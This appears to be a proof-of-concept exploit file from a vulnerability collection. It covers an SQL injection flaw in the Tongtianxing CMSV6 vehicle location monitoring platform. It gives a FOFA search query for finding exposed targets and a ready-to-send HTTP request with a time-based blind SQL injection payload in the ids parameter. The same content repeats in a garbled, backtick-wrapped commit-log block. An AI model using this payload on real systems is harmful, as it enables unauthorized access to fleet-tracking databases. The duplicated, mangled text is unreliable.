POC00/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md

## 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)


## fofa

```
ody="/808gps/"
```


## poc

```
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
```
525更新漏洞 2024-05-25 13:57:14 +08:00			`## 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)`



			`## fofa`

			```
			`ody="/808gps/"`
			```



			`## poc`

			```
			`GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1`
			`Host: your-ip`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0`
			`Accept: /`
			`Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`
			```